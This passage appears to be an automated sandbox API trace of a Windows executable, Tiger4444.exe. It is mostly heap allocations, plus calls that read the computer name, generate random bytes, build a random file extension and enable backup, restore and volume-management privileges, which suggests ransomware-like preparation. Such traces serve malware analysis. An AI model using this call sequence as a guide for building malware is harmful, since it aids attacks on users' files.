Size=0xe) returned 0xc6d0f0 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc1) returned 0xc62830 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x3e) returned 0xc621b8 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x1b) returned 0xc5b048 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x1d) returned 0xc5acb0 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x48) returned 0xc62960 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x12) returned 0xc66860 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x18) returned 0xc66980 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x1b) returned 0xc6fa60 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x24) returned 0xc65478 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x29) returned 0xc677c8 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x1e) returned 0xc6f9e8 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6b) returned 0xc5e1a8 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x17) returned 0xc669a0 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xf) returned 0xc6d198 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x16) returned 0xc66a00 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x28) returned 0xc656b8 [0030.083] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x27) returned 0xc65508 [0030.083] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x12) returned 0xc66880 [0030.083] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x21) returned 0xc655c8 [0030.083] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x10) returned 0xc6d240 [0030.083] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x1c) returned 0xc6f8f8 [0030.083] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x12) returned 0xc667c0 [0030.083] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc6fe00 | out: hHeap=0xc50000) returned 1 [0030.083] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x800) returned 0xc6fb30 [0030.083] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0030.083] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x220a6) returned 0x0 [0030.083] GetStartupInfoW (in: lpStartupInfo=0xaffe20 | out: lpStartupInfo=0xaffe20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0030.083] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe\" " [0030.083] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe\" ", pNumArgs=0xafe1b0 | out: pNumArgs=0xafe1b0) returned 0xc5e7c8*="C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe" [0030.084] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x5e0) returned 0xc70780 [0030.084] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x5e0) returned 0xc70d68 [0030.084] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe") returned 37 [0030.084] lstrcatW (in: lpString1="", lpString2="Tiger4444.exe" | out: lpString1="Tiger4444.exe") returned="Tiger4444.exe" [0030.084] lstrcpynW (in: lpString1=0x53f80, lpString2="C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe", iMaxLength=25 | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0030.084] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Desktop\\", lpString2="ids.txt" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\ids.txt") returned="C:\\Users\\FD1HVy\\Desktop\\ids.txt" [0030.084] GetComputerNameW (in: lpBuffer=0x4a8c0, nSize=0xafe028 | out: lpBuffer="NQDPDE", nSize=0xafe028) returned 1 [0030.381] CryptAcquireContextW (in: phProv=0xafdcc0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xafdcc0*=0xc71620) returned 1 [0030.616] CryptGenRandom (in: hProv=0xc71620, dwLen=0x80, pbBuffer=0xafdcdc | out: pbBuffer=0xafdcdc) returned 1 [0030.616] CryptReleaseContext (hProv=0xc71620, dwFlags=0x0) returned 1 [0030.616] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc66eb8 [0030.616] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x200) returned 0xc73360 [0030.617] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x15) returned 0xc66800 [0030.617] wsprintfW (in: param_1=0x41640, param_2=".%S" | out: param_1=".BFC0E91B00AE8A0620D3") returned 21 [0030.617] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66800 | out: hHeap=0xc50000) returned 1 [0030.617] GetSystemInfo (in: lpSystemInfo=0x413e0 | out: lpSystemInfo=0x413e0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.617] GetCurrentProcess () returned 0xffffffff [0030.617] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xafe1b8 | out: TokenHandle=0xafe1b8*=0x1e4) returned 1 [0030.617] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeBackupPrivilege", lpLuid=0xafe0b4 | out: lpLuid=0xafe0b4*(LowPart=0x11, HighPart=0)) returned 1 [0030.621] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0xafe0bc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0030.621] GetLastError () returned 0x0 [0030.621] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeRestorePrivilege", lpLuid=0xafe0b4 | out: lpLuid=0xafe0b4*(LowPart=0x12, HighPart=0)) returned 1 [0030.622] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0xafe0bc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0030.622] GetLastError () returned 0x0 [0030.622] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeManageVolumePrivilege", lpLuid=0xafe0b4 | out: lpLuid=0xafe0b4*(LowPart=0x1c, HighPart=0)) returned 1 [0030.622] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0xafe0bc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0030.622] GetLastError () returned 0x0 [0030.623] lstrcatA (in: lpString1="", lpString2="local" | out: lpString1="local") returned="local" [0030.623] lstrcatA (in: lpString1="", lpString2="network" | out: lpString1="network") returned="network" [0030.623] GetSystemTime (in: lpSystemTime=0xc70c6c | out: lpSystemTime=0xc70c6c*(wYear=0x7e3, wMonth=0x5, wDayOfWeek=0x6, wDay=0x12, wHour=0x6, wMinute=0x27, wSecond=0x26, wMilliseconds=0x2db)) [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc66f78 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71f28 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc5e560 [0030.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71f28 | out: hHeap=0xc50000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc61910 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc56ed0 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc66f88 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc612d8 [0030.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc610b0 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x10c) returned 0xc73770 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73c90 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc611c0 [0030.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc73888 [0030.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc611c0 | out: hHeap=0xc50000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75498 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73b40 [0030.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75498 | out: hHeap=0xc50000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x88) returned 0xc611c0 [0030.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73b40 | out: hHeap=0xc50000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc755e0 [0030.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc611c0 | out: hHeap=0xc50000) returned 1 [0030.623] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.623] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.624] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc610b0 | out: hHeap=0xc50000) returned 1 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73888 | out: hHeap=0xc50000) returned 1 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73770 | out: hHeap=0xc50000) returned 1 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc755e0 | out: hHeap=0xc50000) returned 1 [0030.626] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c90 | out: hHeap=0xc50000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc73f50 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc5fd10 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc5f6a8 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc5eeb8 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc61df8 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc5fb20 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc610b0 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc61140 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc611d0 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc73770 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc73800 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc73890 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc73920 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc755e0 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75c38 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75cc8 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75d58 [0030.626] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75728 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc765c8 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76388 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc757b8 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76418 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75848 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75ba8 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc758d8 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75a88 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75968 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75698 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75e78 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76538 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75de8 [0030.627] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76028 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, 